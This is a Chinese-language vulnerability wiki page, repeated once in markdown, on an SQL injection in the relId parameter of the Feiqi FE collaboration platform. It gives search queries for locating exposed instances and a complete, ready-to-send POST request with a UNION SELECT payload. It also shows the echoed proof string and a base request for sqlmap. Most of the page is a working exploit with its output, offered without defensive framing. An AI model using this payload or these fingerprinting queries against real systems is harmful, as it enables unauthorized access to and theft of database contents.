fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台relId存在SQL注入漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台relId存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

POST /mobile/validate.js%70 HTTP/1.1
Host: {hostname}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

json={"relId":"1'+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2878%29%2BCHAR%2874%29%2BCHAR%2897%29%2BCHAR%2875%29%2BCHAR%2898%29%2BCHAR%2879%29%2BCHAR%2884%29%2BCHAR%28122%29%2BCHAR%28103%29%2BCHAR%2873%29%2BCHAR%2873%29%2BCHAR%28104%29%2BCHAR%2873%29%2BCHAR%2899%29%2BCHAR%28106%29%2BCHAR%2875%29%2BCHAR%2886%29%2BCHAR%2870%29%2BCHAR%2865%29%2BCHAR%2884%29%2BCHAR%2880%29%2BCHAR%2889%29%2BCHAR%2898%29%2BCHAR%2868%29%2BCHAR%2873%29%2BCHAR%28107%29%2BCHAR%2888%29%2BCHAR%2898%29%2BCHAR%28111%29%2BCHAR%28116%29%2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%28101%29%2BCHAR%28104%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2867%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL%2CNULL--+wMCa","type":"0"}

回显

qzxvqNJaKbOTzgIIhIcjKVFATPYbDIkXbotXpehmdCFxMqjqjq

sqlmap

POST /mobile/validate.js%70 HTTP/1.1
Host: {hostname}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

json={"type":"0","relId":"1"}

原文: https://www.yuque.com/xiaokp7/ocvun2/tkvv6xn9d2v3rw1d

# 飞企互联FE业务协作平台relId存在SQL注入漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台relId存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/Kjr55YD7hU9nUMmE/1699089816407-bde9e92a-e1f9-4241-bfde-6f8d413f338e-290498.png)

# 四、漏洞复现
```
POST /mobile/validate.js%70 HTTP/1.1
Host: {hostname}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

json={"relId":"1'+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2878%29%2BCHAR%2874%29%2BCHAR%2897%29%2BCHAR%2875%29%2BCHAR%2898%29%2BCHAR%2879%29%2BCHAR%2884%29%2BCHAR%28122%29%2BCHAR%28103%29%2BCHAR%2873%29%2BCHAR%2873%29%2BCHAR%28104%29%2BCHAR%2873%29%2BCHAR%2899%29%2BCHAR%28106%29%2BCHAR%2875%29%2BCHAR%2886%29%2BCHAR%2870%29%2BCHAR%2865%29%2BCHAR%2884%29%2BCHAR%2880%29%2BCHAR%2889%29%2BCHAR%2898%29%2BCHAR%2868%29%2BCHAR%2873%29%2BCHAR%28107%29%2BCHAR%2888%29%2BCHAR%2898%29%2BCHAR%28111%29%2BCHAR%28116%29%2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%28101%29%2BCHAR%28104%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2867%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL%2CNULL--+wMCa","type":"0"}
```
![image.png](./img/Kjr55YD7hU9nUMmE/1702459821086-cd4a5f14-f063-4b66-b05d-51b3dbddf183-452572.png)
回显
```
qzxvqNJaKbOTzgIIhIcjKVFATPYbDIkXbotXpehmdCFxMqjqjq
```
sqlmap
```
POST /mobile/validate.js%70 HTTP/1.1
Host: {hostname}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

json={"type":"0","relId":"1"}
```
![image.png](./img/Kjr55YD7hU9nUMmE/1702459890864-dc25fd02-e49b-455b-80ad-475ae64a4ec7-886957.png)
![image.png](./img/Kjr55YD7hU9nUMmE/1702459899302-e717f951-e322-4cd4-9f72-8c3fb9fc2418-820238.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tkvv6xn9d2v3rw1d>